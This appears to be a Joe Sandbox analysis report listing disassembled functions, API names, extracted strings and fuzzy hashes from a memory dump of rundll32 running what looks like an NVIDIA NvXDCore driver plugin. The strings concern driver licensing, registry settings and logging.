                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: swprintf$Init_thread_footerstrstr
                                                                    • String ID: "jti":"$"lease_list": {[$"system_clock_snapshot":"$GridCloudLicensingTrustedStorage.cpp$Malformed response - Could not find the expected tag$No content in local trusted store$cloudLicTSFetchParam
                                                                    • API String ID: 661432455-1619096017
                                                                    • Opcode ID: 30f0b05db5e2b0543325c0f638f6128f65fc80f1bbfdad7fbd96e10bba8cd859
                                                                    • Instruction ID: b7aa5322fabbfcea3e3395e0513fbfadec539f7db256dee1dfc794fc0ee8f2ac
                                                                    • Opcode Fuzzy Hash: 30f0b05db5e2b0543325c0f638f6128f65fc80f1bbfdad7fbd96e10bba8cd859
                                                                    • Instruction Fuzzy Hash: 2CE11E31A0AB81A5FB10DB50E4402EE77A4FB847D8F900136EA9D03BA9EF7CD159CB54
                                                                    Function 00007FF8A8D0433C Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 245registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Deallocatestd::_$_invalid_parameter_noinfo_noreturn$CloseOpenQueryValue
                                                                    • String ID: DefaultLogLevel$OriginRules
                                                                    • API String ID: 536763390-3104795989
                                                                    • Opcode ID: 18fe5868ac3e4d2203944b692ae30855630519383eec40fa974bff6406e3b4bf
                                                                    • Instruction ID: 1064dc4f42c002c81c883f0a287c57dd1ed748e1c18d02f8743489d47efbdf52
                                                                    • Opcode Fuzzy Hash: 18fe5868ac3e4d2203944b692ae30855630519383eec40fa974bff6406e3b4bf
                                                                    • Instruction Fuzzy Hash: 3DA1F572A19682A5EB10EF62E8405ED7B71FB857C8F405036EE1E17A99DF3CD608C748
                                                                    Function 00007FF8A8CFCCF0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 143libraryloadermemoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$Local$AllocConditionFreeInfoMaskVerifyVersion
                                                                    • String ID: Advapi32.dll$CloseServiceHandle$OpenSCManagerW$OpenServiceW$QueryServiceConfigW
                                                                    • API String ID: 576420853-2874019189
                                                                    • Opcode ID: 81bcd578cec1459cf1dcbd3d417f16b885c54f230b3579af7cd1a880c5a440dd
                                                                    • Instruction ID: c2d2ccf8eee57889279b146fefeb88b6210e0ab485314d4bcebb61f1f62a85e7
                                                                    • Opcode Fuzzy Hash: 81bcd578cec1459cf1dcbd3d417f16b885c54f230b3579af7cd1a880c5a440dd
                                                                    • Instruction Fuzzy Hash: 58510635B0BB12E2FB55DB12A86057922A1FF58BD0F084439DD4E46760EF7CE8218638
                                                                    Function 00007FF8A8D2F90C Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 135stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: DeleteValue$lstrcat
                                                                    • String ID: DeleteNLSNodeUrlRegistryValues$Failed to clear the registry value for alternate server URL$Failed to clear the registry value for server URL$NLSServerURL$NLSStandbyServerURL$NvXDCore.cpp$SOFTWARE\NVIDIA Corporation\Global\GridSW$SYSTEM\CurrentControlSet\Services\nvlddmkm\Global\GridSW
                                                                    • API String ID: 180844452-2884575481
                                                                    • Opcode ID: 5b5da7a39a30377fd96a2bd621c2668a4b98f95b85f95207946d071c1176ab47
                                                                    • Instruction ID: 86126fad13e17539e0cdba086b6b55c63d7bb728bcb97cc67050e925ecbe5f89
                                                                    • Opcode Fuzzy Hash: 5b5da7a39a30377fd96a2bd621c2668a4b98f95b85f95207946d071c1176ab47
                                                                    • Instruction Fuzzy Hash: 1B611B32A0AB42E5E7109BA0E8400ED77B4FB847D4F900236EA9D53B69EF3CD159CB54
                                                                    Function 00007FF8A8D46CD8 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 129synchronizationthreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: ClassObject$CloseCreateEventHandle$ObjectsRegisterResumeRevokeSingleThreadWait
                                                                    • String ID: NvXDCore.cpp
                                                                    • API String ID: 756728269-624928461
                                                                    • Opcode ID: 7a43a5a631725520e35c25329734bfc67b2278e87e67bfcac4d7afb62722369a
                                                                    • Instruction ID: cab4f6b9011a592f9d8cbb49a9acd8e5d21e0ea5938c9c60c6e3f3f1bd3573f4
                                                                    • Opcode Fuzzy Hash: 7a43a5a631725520e35c25329734bfc67b2278e87e67bfcac4d7afb62722369a
                                                                    • Instruction Fuzzy Hash: 48513735A0AA02E2FF558B15F84027963A1FF84BC5F098035C95E47764EF7DE4698378
                                                                    Function 00007FF8A8D31D64 Relevance: 17.8, APIs: 4, Strings: 6, Instructions: 341COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$CloseCreateHandleInit_thread_footerInstanceMultipleObjectsWait
                                                                    • String ID: SyncHandles Are$NvXDCore.cpp$Nvidia::UXDriver::Core::NvXDCorePlugin::HandleCplShutdown$wait for sync mutext failed$waiting for SyncHandles count$waiting for SyncHandles finished with the result
                                                                    • API String ID: 3807003664-2047345439
                                                                    • Opcode ID: 0b9c20ea03ebd9dbad61d74de9f5408c606bbc6890b3fb68dbf3ab403222f65e
                                                                    • Instruction ID: ff39268ee0b68782575a9fa618c035e9e7d827b712ce2fc9be162e87283bd5bf
                                                                    • Opcode Fuzzy Hash: 0b9c20ea03ebd9dbad61d74de9f5408c606bbc6890b3fb68dbf3ab403222f65e
                                                                    • Instruction Fuzzy Hash: 70F10C36B0AB42A9EB10DBA1D4401ED33B5FB44798F400536DE5D17B59EF38D129C398
                                                                    Function 00007FF8A8CFD798 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 159registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Value$DeleteQuery$CloseOpen
                                                                    • String ID: DriverError\ErrorCode$DriverError\ErrorContext
                                                                    • API String ID: 3061106577-343931756
                                                                    • Opcode ID: e8b55f2feab4bbdb2e5f427509d0c0b4b64532db7f2b9eb8bdf90c0d6540112f
                                                                    • Instruction ID: 629bd2de4dadde0a2bc66a20d671661ba9584af99fd6fb8001dc12e0ffded5f2
                                                                    • Opcode Fuzzy Hash: e8b55f2feab4bbdb2e5f427509d0c0b4b64532db7f2b9eb8bdf90c0d6540112f
                                                                    • Instruction Fuzzy Hash: 2951A23261AB4292EB50DF10E8407BA77A4FB88BD4F405036EE8E43A54EF3CD954CB24
                                                                    Function 00007FF8A8CFBAE4 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 117libraryloadermemoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: AddressErrorLastLocalProc$AllocConditionFreeInfoMaskVerifyVersion
                                                                    • String ID: SYSTEM\CurrentControlSet\Control\Class\$SetupDiDestroyDeviceInfoList$SetupDiGetDeviceRegistryPropertyW$Setupapi.dll
                                                                    • API String ID: 2783935822-1735570339
                                                                    • Opcode ID: ea7982ab65b0be596e67a36e9fb1c312a3c390b9a24ba4bca06979929f529bb5
                                                                    • Instruction ID: f89cca99eb4c622f84f78d0b49fea2cd34bfb7c054131ff5870f798eecc1dc35
                                                                    • Opcode Fuzzy Hash: ea7982ab65b0be596e67a36e9fb1c312a3c390b9a24ba4bca06979929f529bb5
                                                                    • Instruction Fuzzy Hash: B7513931A0AB12E6FB50CB21E8506A923A0FF487C4F444039DD4E57B59EF7CE965C728
                                                                    Function 00007FF8A8D01D08 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 50COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionThrow$std::ios_base::failure::failure
                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                    • API String ID: 1099746521-1866435925
                                                                    • Opcode ID: 7a8d0049a9d0e06720ebc07020fd1cc616381782ec0e2f7e48c170f5f1d1b8dd
                                                                    • Instruction ID: 54b5bbe34b023c4d07fe19fb6caef816c5524351d30a6ef636faecd34fbb53f1
                                                                    • Opcode Fuzzy Hash: 7a8d0049a9d0e06720ebc07020fd1cc616381782ec0e2f7e48c170f5f1d1b8dd
                                                                    • Instruction Fuzzy Hash: 0D11D661E2A647B1EE04E710C8412F923A0EF507C4F90543AE6EE07996DF7DE90EC768
                                                                    Function 00007FF8A8D08F3C Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 287registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Close$Deallocatestd::_$Open
                                                                    • String ID: LogFilters$LogManagers\$LogPrinters
                                                                    • API String ID: 1882939507-3386155771
                                                                    • Opcode ID: 4de4560469443e222230ed4f737482b2e7f9c7366df2abc6aed90be0a103b973
                                                                    • Instruction ID: 337ce092dc022f9d8a5840fed9fde9bbb6042e7190925015bd62488b681003d3
                                                                    • Opcode Fuzzy Hash: 4de4560469443e222230ed4f737482b2e7f9c7366df2abc6aed90be0a103b973
                                                                    • Instruction Fuzzy Hash: E7C1823260ABC6A1EB60DB21E4407AEA370FB85BD4F445135DAAE43B95DF3CD948C718
                                                                    Function 00007FF8A8D31070 Relevance: 16.0, APIs: 2, Strings: 7, Instructions: 256COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CreateEventFromGuidsInit_thread_footerInstanceStringTraceUnregister
                                                                    • String ID: APPID$NvXDCore.cpp$Nvidia::UXDriver::Core::NvXDCorePlugin::OnUnInitialize$Received OnUnInitialize() from NvContainer$Unregistering AppId for NvXDCoreModule$Unregistering server for NvXDCoreModule${C5EDFC9D-B018-41A4-9877-39AB18469C3A}
                                                                    • API String ID: 2576725573-2006552945
                                                                    • Opcode ID: 7f87d3fff44f14fdff29451ae0676118c8797f00f55233acd2d0c76cc97a0955
                                                                    • Instruction ID: af252be2034d0de301baf50a3656fadffdc597134d510fc4a94bea11f20db66c
                                                                    • Opcode Fuzzy Hash: 7f87d3fff44f14fdff29451ae0676118c8797f00f55233acd2d0c76cc97a0955
                                                                    • Instruction Fuzzy Hash: 64C12B32A06B82E9EB119F61E8401ED33A4FB447D8F800139EA9D57B69EF3CD559C358
                                                                    Function 00007FF8A8D754D0 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 168COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo$FileSizeswprintf
                                                                    • String ID: Failed to allocate memory$Failed to get file handle %s (%s)$Failed to open file %s (%s)$File size is greater than the maximum allowed limit$GridCommonUtils.cpp$Invalid output buffer to read the file$readDataFromFile
                                                                    • API String ID: 1804721631-2846590039
                                                                    • Opcode ID: 787ba92b32396975d36dd7a8a3d990c1eac88cc14c00e52c62fd1c738779817d
                                                                    • Instruction ID: c37ca4f5405dc9313b9e5b24934696dcb553f2360f67198e920140c11b52524d
                                                                    • Opcode Fuzzy Hash: 787ba92b32396975d36dd7a8a3d990c1eac88cc14c00e52c62fd1c738779817d
                                                                    • Instruction Fuzzy Hash: 2F719121A0BB82A5FB109B61E4003EA67A0FF847D8F500635DA6D17796EF3CE419C758
                                                                    Function 00007FF8A8CFD370 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 124libraryloadermemoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
